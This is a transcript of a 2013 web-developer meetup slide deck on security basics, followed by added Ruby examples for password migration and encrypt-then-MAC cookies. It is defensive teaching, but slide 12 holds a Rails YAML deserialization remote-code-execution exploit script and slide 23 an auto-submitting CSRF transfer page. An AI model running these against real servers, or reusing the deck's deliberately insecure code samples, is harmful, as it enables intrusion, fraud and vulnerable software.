Security for dummies

Presentation given at the Enschede Web Developers meetup


Dirkjan Bussink

June 25, 2013


  1. Dirkjan Bussink d.bussink@gmail.com twitter.com/dbussink github.com/dbussink

  2. Security 101 The very very basics

  3. Not part of today

  4. Social Engineering Because there is no patch for human stupidity

  5. statement = "SELECT * FROM users WHERE name = '" + username + "'" SQL Injection
  6. None
  7. statement = ["SELECT * FROM users WHERE name = ?", username] SQL Injection Parameter binding
  8. Cross site scripting <div><%= person.name %></div> Inject Javascript!

  9. Mass assignment <html> <body> <form method="post" action="new_person"> <input type="text" name="name" value="" id="" /> <input type="hidden" name="parent_id" value="123" id="" /> <input type="submit" value="" id="" /> </form> </body> </html> What if I add this?
  10. Frameworks Solve it easily for you

  11. Remote code execution Let the server run my ruby rce.rb

  12. require 'net/http' require 'net/https' require 'uri' require 'yaml' code =

    ARVG[0] url = "http://localhost:3000" escaped_code = "foo; #{code}\n__END__\n" yaml = %{ --- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection ? #{escaped_code.to_yaml.sub('--- ','').chomp} : !ruby/object:OpenStruct table: :defaults: :action: create :controller: foos :required_parts: [] :requirements: :action: create :controller: foos :segment_keys: - :format modifiable: true }.strip xml = %{ <?xml version="1.0" encoding="UTF-8"?> <exploit type="yaml">#{yaml}</exploit> }.strip uri = URI.parse(url) http = Net::HTTP.new(uri.host, uri.port) request = Net::HTTP::Post.new(uri.request_uri, "X-HTTP-Method-Override" => "GET") request.content_type = "text/xml" request.set_body_internal(xml) response = http.request(request)
  13. Direct object references http://myapp.com/people/1 Let’s change this to 2!

  14. Access control Scope your queries

  15. External input Trust nobody

  16. None
  17. Set-Cookie: session_id=lee2oochaekae4woh6A; path=/; document.cookie => "session_id=lee2oochaekae4woh6A;" Steal cookie in combination with an XSS attack
  18. Set-Cookie: session_id=lee2oochaekae4woh6A; path=/; HttpOnly document.cookie => "" HttpOnly Disallows reading by Javascript
  19. Set-Cookie: session_id=lee2oochaekae4woh6A; path=/; HttpOnly; secure Secure Only send cookie over

  20. Frameworks Use one that solves this

  21. CSRF Who submits your forms?

  22. None
  23. On my evil hack site Just loading my page transfers money <iframe name=hack></iframe> <script> document.write('<form target=hack name=go method=post action="http://mybank.com/transfer.php"> </form>') go.submit() </script>
  24. <html> <body> <form method="post" action="transfer.php"> <input type="text" name="csrf_token" value="om5bohY2" id="" /> <input type="text" name="amount" value="" id="" /> <input type="text" name="from_account" value="" id="" /> <input type="text" name="to_account" value="" id="" /> <input type="submit" value="" id="" /> </form> </body> </html> Add token to each form Token ensures other site can’t simply POST to your
  25. Hash DOS Crafting input to do DOS attack

  26. [Figure 1: Normal operation of a hash table (buckets 0 to 5)]

      suggested the use of crypto puzzles [9] to force clients to perform more work before the server does its work. Provably requiring the client to consume CPU time may make sense for fundamentally expensive operations like RSA decryption, but it seems out of place when the expensive operation (e.g., HTML table layout) is only expensive because a poor algorithm was used in the system. Another recent paper [16] is a toolkit that allows programmers to inject sensors and actuators into a program. When a resource abuse is detected an appropriate action is taken.

      [Figure 2: Worst-case hash table collisions (buckets 0 to 5)]

      bles are so common that programming languages like Perl provide syntactic sugar to represent hash tables as “associative arrays,” making them easy for programmers to use. Programmers clearly prefer hash tables for their constant-time expected behavior, despite their worst-case O(n) per-operation running time. After all, what are the odds that a hash table will degenerate to its worst case behavior? In typical usage, objects to be inserted into a hashtable are first reduced to a 32-bit hash value. Strings might be hashed using a checksum oper-

      Craft input for collision
  27. Hashes everywhere A lot of attack vectors

  28. SSL in your app Verify certificates

  29. curl_easy_setopt(download_handle, CURLOPT_SSL_VERIFYHOST, 2); 2 is the magic value...

  30. $fp = fsockopen ('ssl://www.paypal.com', 443, $errno, $errstr, 30); fsockopen() does not validate server certificate PHP
  31. The “advanced” SSLSocketFactory API silently skips hostname verification if the algorithm field in the SSL client is NULL or an empty string rather than HTTPS Java Why this as the default?
  32. require "net/http" require "net/https" require "uri" uri = URI.parse("https://secure.site/") http = Net::HTTP.new uri.host, uri.port http.use_ssl = true http.verify_mode = OpenSSL::SSL::VERIFY_PEER request = Net::HTTP::Get.new(uri.request_uri) response = http.request(request) Ruby Does not validate certificate by default...
  33. Stupid APIs Know how to work with them

  34. Storing passwords Can I get the passwords stored in your

  35. None
  36. But I’m safe, I hash and salt! Digest::SHA1.hexdigest( "#{password}--#{salt}" )

  37. 1. 93% were between 6 and 10 characters long
      2. 45% were comprised entirely of lowercase characters
      3. 36% were found in a common password dictionary
      4. 67% were reused by the same person on a totally unrelated service (Gawker)
      5. Only 1% of them contained a non-alphanumeric character

      77 million breached PlayStation Network accounts
  38. 260M checks / second GPU acceleration makes forcing viable these

  39. Salted hashes are not good enough anymore

  40. Libraries Use them, don’t roll your ow

  41. bcrypt PBKDF2 scrypt

  42. Designed to be slow

  43. | KDF | 6 letters | 8 letters | 8 chars | 10 chars | 40-char text |
      |---|---|---|---|---|---|
      | DES CRYPT | < $1 | < $1 | < $1 | < $1 | < $1 |
      | MD5 | < $1 | < $1 | < $1 | $1.1k | $1 |
      | MD5 CRYPT | < $1 | < $1 | $130 | $1.1M | $1.4k |
      | PBKDF2 (100 ms) | < $1 | < $1 | $18k | $160M | $200k |
      | bcrypt (95 ms) | < $1 | $4 | $130k | $1.2B | $1.5M |
      | scrypt (64 ms) | < $1 | $150 | $4.8M | $43B | $52M |
      | PBKDF2 (5.0 s) | < $1 | $29 | $920k | $8.3B | $10M |
      | bcrypt (3.0 s) | < $1 | $130 | $4.3M | $39B | $47M |
      | scrypt (3.8 s) | $900 | $610k | $19B | $175T | $210B |
  44. I have something else now! Migration is not very hard

  45. Add new authentication When user logs in, store password in new way After X time remove old passwords
  46. Signing Don’t design your own

  47. user_id=1--kee0oiviemaeXiW7aeb8eexuthohyua Signed cookies Hash computed with secret

  48. http://myapp.com/profile/1/wa5eexuf9wiex1do Email URL with direct login Hash for one time

  49. Digest::SHA1.hexdigest( "user_id=#{id}-#{secret_token}" ) Hash with a secret Broken

  50. sha256 = OpenSSL::Digest.new('sha256') tag = OpenSSL::HMAC.hexdigest(sha256, secret_token, message) HMAC hash-based message authentication code
  51. Encryption Know what you are doing

  52. AES ECB Just don’t use it

  53. None
  54. AES CBC / CTR When using CBC mode, an Initialization Vector (IV) is provided along with the key when starting an encrypt or decrypt operation. If CBC mode is selected and no IV is provided, an IV of all zeroes will be used.
  55. Don’t trust input Also sign encrypted data

  56. cookie = "j2x+8Y5CqDRnYqRvMsHmi61YBzA7qvc4f7agmYxdHgvqz 7Jaekoxjp3MrgSvB3GU--kc/FbSvFIfIFzM0UzQhhvw==" Encrypted cookie aes-128-cbc

  57. "so long, and thanks for all the fish"

  58. Encrypt then MAC Verify that the data is authentic

  59. Authenticated encryption

  60. None
  61. Background
      - https://www.owasp.org/index.php/Top_10_2010-Main
      - https://www.owasp.org/index.php/SQL_Injection
      - https://www.owasp.org/index.php/Top_10_2010-A4
      - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
      - https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
      - http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003.pdf
      - http://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf
      - http://www.troyhunt.com/2011/06/brief-sony-password-analysis.html
      - http://gpuscience.com/cs/cracking-salted-sha1-password-hashes-on-gpu/
      - http://www.bsdcan.org/2009/schedule/attachments/86_scrypt_slides.pdf
      - http://en.wikipedia.org/wiki/Hash-based_message_authentication_code
      - http://blog.jcoglan.com/2012/06/09/why-you-should-never-use-hash-functions-for-message-authentication/
      - http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#Electronic_codebook_.28ECB.29
      - http://en.wikipedia.org/wiki/Padding_oracle_attack
      - http://tonyarcieri.com/all-the-crypto-code-youve-ever-written-is-probably-broken
      - https://www.coursera.org/course/crypto
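
Slides 44 and 45 describe the password migration in three steps; the sketch below is an added example, not code from the deck. It assumes a hypothetical user record (a Hash with `:scheme`, `:salt`, `:digest`, `:iter`), the salted SHA-1 format from slide 36 as the legacy scheme, and PBKDF2 from Ruby's bundled OpenSSL as the new one; the iteration count is an assumption.

```ruby
require 'digest'
require 'openssl'
require 'securerandom'

ITERATIONS = 100_000 # assumption: tune so one check costs roughly 100 ms

# Legacy format shown on slide 36.
def legacy_digest(password, salt)
  Digest::SHA1.hexdigest("#{password}--#{salt}")
end

def pbkdf2_digest(password, salt, iter)
  OpenSSL::PKCS5.pbkdf2_hmac(password, salt, iter, 32,
                             OpenSSL::Digest.new('sha256')).unpack1('H*')
end

# Comparison that does not stop at the first differing byte.
def secure_compare(a, b)
  a.bytesize == b.bytesize &&
    a.bytes.zip(b.bytes).reduce(0) { |d, (x, y)| d | (x ^ y) }.zero?
end

# user is a hypothetical record: { scheme:, salt:, digest:, iter: }
def login(user, password)
  case user[:scheme]
  when :pbkdf2
    secure_compare(pbkdf2_digest(password, user[:salt], user[:iter]), user[:digest])
  when :sha1
    return false unless secure_compare(legacy_digest(password, user[:salt]), user[:digest])
    # The plaintext is only available at login, so re-hash it now.
    salt = SecureRandom.hex(16)
    user.merge!(scheme: :pbkdf2, salt: salt, iter: ITERATIONS,
                digest: pbkdf2_digest(password, salt, ITERATIONS))
    true
  else
    false # legacy hash already removed: the user must reset the password
  end
end

# "After X time remove old passwords": drop whatever is still on the old scheme.
def expire_legacy!(users)
  users.each do |u|
    u.merge!(scheme: :reset_required, salt: nil, digest: nil) if u[:scheme] == :sha1
  end
end
```
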
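
Slides 54 to 58 (an explicit IV instead of the all-zero default, signing encrypted data, encrypt then MAC) combined in one added example that is not part of the original deck. The key values, the names `seal` and `open_cookie`, and the `body--tag` layout (modelled on the cookie on slide 56) are assumptions.

```ruby
require 'openssl'

# Constructed demo keys; real keys are random and the two must be independent.
ENC_KEY = OpenSSL::Digest.new('sha256').digest('demo-enc-key')[0, 16]
MAC_KEY = OpenSSL::Digest.new('sha256').digest('demo-mac-key')

def mac(data)
  OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), MAC_KEY, data)
end

# Comparison that does not stop at the first differing byte.
def secure_compare(a, b)
  a.bytesize == b.bytesize &&
    a.bytes.zip(b.bytes).reduce(0) { |d, (x, y)| d | (x ^ y) }.zero?
end

# Encrypt, then MAC the IV and ciphertext together.
def seal(plaintext)
  cipher = OpenSSL::Cipher.new('aes-128-cbc').encrypt
  cipher.key = ENC_KEY
  iv = cipher.random_iv # fresh random IV per message, never the all-zero default
  body = iv + cipher.update(plaintext) + cipher.final
  "#{[body].pack('m0')}--#{[mac(body)].pack('m0')}"
end

# Returns the plaintext, or nil when the cookie is malformed or not authentic.
def open_cookie(cookie)
  body64, tag64 = cookie.split('--', 2)
  return nil if tag64.nil?
  body = body64.unpack1('m0')
  tag = tag64.unpack1('m0')
  # Check the tag before the ciphertext reaches the cipher, so a forged
  # cookie never gets as far as padding validation.
  return nil unless secure_compare(mac(body), tag)
  cipher = OpenSSL::Cipher.new('aes-128-cbc').decrypt
  cipher.key = ENC_KEY
  cipher.iv = body[0, 16]
  (cipher.update(body[16..-1]) + cipher.final).force_encoding('UTF-8')
rescue ArgumentError # invalid base64
  nil
end
```
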